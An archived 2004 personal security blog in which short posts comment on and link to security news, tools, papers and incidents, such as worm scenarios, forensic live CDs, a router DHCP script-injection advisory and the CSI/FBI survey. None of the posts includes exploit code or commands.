Security musings (reflectorium)
Security musings (reflectorium)
Tuesday, June 29, 2004
Instant Messaging in the Enterprise introduces risks..(0) comments
This seems to be a hot topic lately. - With predictions of a possible instant messaging worm. A nice write-up "Top 5 IM security risks" can be found here:
http://www.VMyths.com and the 100% virus detection guarantee(0) comments
A site "about computer virus myths, hoaxes, urban legends, hysteria, and the implications if you believe in them. You can also search a list of computer virus hoaxes & virus hysteria from A to Z".
On the other hand, I think that this particular article "An open letter to the CISO of the American Red Cross" that they carry right now, is grossly unfair to Ron Baklarz and incredibly naive in the way it buys into sales pitches. So two antivirus scanning operations claim that they have a "money back guarantee" if a mail virus slips through .. I mean .. really.. irony on/off ??
There shouldn't be a 100% virus detection guarantee ever..
We should have learnt that much by now.
Monday, June 28, 2004
Max Mosers Auditor CD-Rom update(0) comments
Max Moser has released a new version of the Auditor security collection (auditor-220604-01B). It is available now
Friday, June 25, 2004
Virus Total Web Site(0) comments
very cool site.. "Virustotal offers a free service of suspicious file scanning, using several antivirus engines."
Wednesday, June 23, 2004(0) comments (0) comments
Tuesday, June 22, 2004
Fold your own 2-CD case from a sheet of paper(0) comments
Jorma Oksanen has instructions on how to fold a 2-CD case out of a sheet of paper. (Without glue): http://www.sci.fi/~tenu/diag/2CD.gif
Found this at Tim Pritlove's Lunatic Fringe.
Foremost - free forensic tool by the United States Air Force Office of Special Investigations(0) comments (0) comments
The US Air Force Office of Special Investigations offers a free forensic toolkit.
"Foremost is a console program to recover files based on their headers and footers."
You can get it at http://foremost.sourceforge.net/ .
In addition, there's also a NetworkWorldFusion article to go with it.
Script injection via DHCP(0) comments
Now this is fun. - It seems that with one SOHO wireless router (AirPlus DI-614+) you can make the administrator run malicious scripts when he looks at the the web-based management console.
In a nutshell:
+ you send a maliciously hand-crafted DHCP packet
+ which the router takes and verbatimly embeds in the DHCP administrative and logs web pages it offers to the admin
Details are at
Monday, June 21, 2004
Security Managers Could Face Court Penalties(0) comments
Just to showcase how dangerous the security manager job can be - another article, this one titled "Security Managers Could Face Court Penalties" - scary stuff, takes real men, 'nuff said.. ;-)
One company's SASSER thriller story(0) comments
A nice thriller-like story on how some fictitious company experienced SASSER. If someone thinks your job is dull, this is probably what you want to let them read..
Saturday, June 19, 2004
The home of the penguin sleuth cd-rom(0) comments
Using a live-cd for forensics. (e.g. like knoppix std, fire, ..)
Internet Security Alliance and its best practice guides(0) comments
The Internet Security Alliance has published some best practice guides and is working on some more. (see http://www.isalliance.org/ ).
CCCure has the story that DHS tells Congress it Endorses the ISA Best Practices Guide,
The SASSER author - responsibility and age(0) comments
Axel has some worthwhile thoughts on responsibility and age - and the what future might held for the SASSER author over at his blog.
Friday, June 18, 2004
IT-Security and outsourcing in the financial services industry(0) comments
This my marketing plug. =)
Here's a German review of IT-Sicherheitsmanagement in Banken.
(A book on security management in banks, that I contributed to last year).
Thursday, June 17, 2004
HOACD 1.0 (bootable OpenBSD + honeyd CD)(0) comments
The Brazilian Distributed Honeypots Project brings us: HOACD = Honeyd+OpenBSD+Arpd in a CD.
"It is the implementation of a low-interaction honeypot that runs directly from a CD and
stores its logs and configuration files on a hard disk."
"The CD is bootable and uses the OpenBSD operating system, the low-interaction honeypot daemon honeyd and the user-space arp daemon."
The CD image is available at:
Sunday, June 13, 2004
Blog aggregation sites and "The blog-only news diet"(0) comments
Poynteronline carries a story on, Steve Rubel, a guy that tried to live on a blog-only news diet. Steve also covers this in his own blog micropersuasion. - In the article Steve points out several blog aggregation sites that helped him during his "diet":
Saturday, June 12, 2004
2004 New CSI/FBI Computer Crime and Security Survey is out(0) comments
The New CSI/FBI Computer Crime and Security Survey is out. Dana Epp has a nice summary and links in his most excellent blog. One quote from his summary "Most organizations conduct some form of economic evaluation of their security expenditures, with 55 percent using Return on Investment (ROI), 28 percent using Internal Rate of Return (IRR), and 25 percent using Net Present Value (NPV)." (Hello Axel!) - Somehow I sense an upcoming thread on this on cissp-forum..
[Comment: I had to re-edit this, after realising that Dana Epp is a guy.. a big one apparently.. -> page with his picture? Note to self: x-files, Agent Mulder, Dana Scully - look for subtext ("truth is out there?"). ]
Thursday, June 10, 2004
Security quiz at ISS(0) comments
ISS is offering some security tests (multiple-choice questions, anonymous, free)
Everyone at SUN can blog..(0) comments
blogs.sun.com is an official site set up by SUN, so all their employees can blog. - This Infoworld article discusses some of the aspects of it. All in all, I think this is a very interesting move. Now, I don't know what SUN would do if any internal information would leak that way.
By the way, on blogs.sun.com, there's also this blog entry about getting hit with a Denial-of-Service attack just prior to an official announcement.
Hacker Intel is shutting down for good..(0) comments
from the site below "I'll leave Hacker Intel online for a few more days. Eventually I'll take it down so if you want any of the 900 plus stories in the archives grab them now."
It's sad that the site closes.
Terror Threat Levels(0) comments
The USA have this interesting concept of color-coding "threat levels" - which seems a bit bizarre to me, to be honest, outside a military setting.
Here's the US Homeland security system explained by the DHS. There's also a nice site called Ready.GOV that has some "guidance". - This site has been parodied here.
Whackyneighbor puts its level at
For geekandproud, it's at
.. some good source of information is here.
Application worms(0) comments
Just to emphasise my point made earlier that quite a few people are thinking about future worms: Here's an article on "Application Worms" - which, while they do sound like automated hacking agents, don't look like terrible effective "worms" to me. It has some good points though, and of course Google is a means for finding systems vulnerable to some attacks..
a net law blog(0) comments
I just came across a Net Law Blog at
They do carry an interesting story about some banks banning 3rd party (webmail) access for their employees. The idea of which was somewhat hotly debated on a few forums.
"A worst case worm" paper by Nicholas Weaver and Vern Paxson (and Stuart Staniford)(0) comments
This entry is for Axel (Balrog) Eble, who hasn't seen that one on the f-secure blog before . - No really, I wanted to blog this, but then I somehow forgot.
Nicholas Weaver et al. published a paper on a worst-case worm that could cause $50 billion or more in damage by attacking Microsoft Windows systems and carrying a destructive payload.
Apparently, quite a few people are developing worst worm scenarios now (incl. Axel, Marcus and me..) Bruce Schneier just commented on WITTY and the "firsts" that came with it elsewhere. (Basically, he is commenting on that other Weaver paper blogged below.)
Wednesday, June 09, 2004
One of the things we discussed in the last CISSP-FFM meeting.
A new version of the framework has just been released by HD Moore et al.:
Tuesday, June 08, 2004
Reflections on Witty(0) comments
Wireless Auditing LiveCD(0) comments
Max Mosers Auditor CD includes a lot of useful tools
Sanctum Paper on HTTP response splitting, web cache poisoning attacks, and related topics(0) comments
Sanctum published paper on "Divide and Conquer - HTTP response splitting, web cache poisoning attacks, and related topics" in March 2004. I read it last nights. It's an excellent read, very technical, with some sample code. It discusses the behaviour of common platforms, incl. IE 6.0 SP1, Squid 2.4, Apache/2.0, Netcache/5.2 and WebLogic 8.1 SP1. - It reads almost like a scientific paper, with a lot of helpful practical information. I think it really helps to understand some of the often-over-looked risks in web services security.
- After reading the paper, cache poisoning is no longer a remote possibility. (I know we've seen report on it being used for years, but this paper adds a new twist.)
Monday, June 07, 2004(0) comments
Friday, June 04, 2004
Scripting with the Microsoft Baseline Security Analyser 1.2(0) comments
and of course the FAQ of the beast at
- which is, mind you, not a real beast.
Thursday, June 03, 2004
IDC 3rd Security Conference (Germany, Switzerland)(0) comments
Looks like it could be a fun event, curious about the actual agenda.
Wednesday, June 02, 2004
Understanding Threat Modelling(0) comments
Good coverage at Dana Epp's most excellent blog:
also for the Microsoft Threat Modelling tool:
RSS Feed now atom.xml!
Essential Security Web-Sites
Recently added Detections from CAI
Standalone Virus Cleaner
Trendmicro Sysclean and Signature, Symantec Removal tools, Stinger from McAfee, F-Secure removal tools, Bitdefender free removal tools
ARCHIVES11/01/2003 - 12/01/2003
/ 12/01/2003 - 01/01/2004
/ 01/01/2004 - 02/01/2004
/ 02/01/2004 - 03/01/2004
/ 03/01/2004 - 04/01/2004
/ 04/01/2004 - 05/01/2004
/ 05/01/2004 - 06/01/2004
/ 06/01/2004 - 07/01/2004
/ 07/01/2004 - 08/01/2004
/ 08/01/2004 - 09/01/2004
/ 09/01/2004 - 10/01/2004
/ 10/01/2004 - 11/01/2004
/ 01/01/2005 - 02/01/2005
/ 02/01/2005 - 03/01/2005
/ 03/01/2005 - 04/01/2005
/ 04/01/2005 - 05/01/2005
/ 05/01/2005 - 06/01/2005
/ 06/01/2005 - 07/01/2005
/ 07/01/2005 - 08/01/2005
/ 01/01/2006 - 02/01/2006
/ 02/01/2006 - 03/01/2006
/ 03/01/2006 - 04/01/2006
/ 06/01/2006 - 07/01/2006
/ 08/01/2006 - 09/01/2006
/ 09/01/2006 - 10/01/2006
/ 12/01/2006 - 01/01/2007
/ 03/01/2007 - 04/01/2007
/ 05/01/2007 - 06/01/2007
/ 07/01/2007 - 08/01/2007
/ 08/01/2007 - 09/01/2007
/ 10/01/2007 - 11/01/2007
/ 11/01/2007 - 12/01/2007
/ 12/01/2007 - 01/01/2008
/ 02/01/2008 - 03/01/2008
/ 09/01/2008 - 10/01/2008
/ 10/01/2008 - 11/01/2008
/ 03/01/2009 - 04/01/2009
/ 09/01/2009 - 10/01/2009
/ 11/01/2009 - 12/01/2009
/ 01/01/2010 - 02/01/2010
/ 02/01/2010 - 03/01/2010
/ 06/01/2010 - 07/01/2010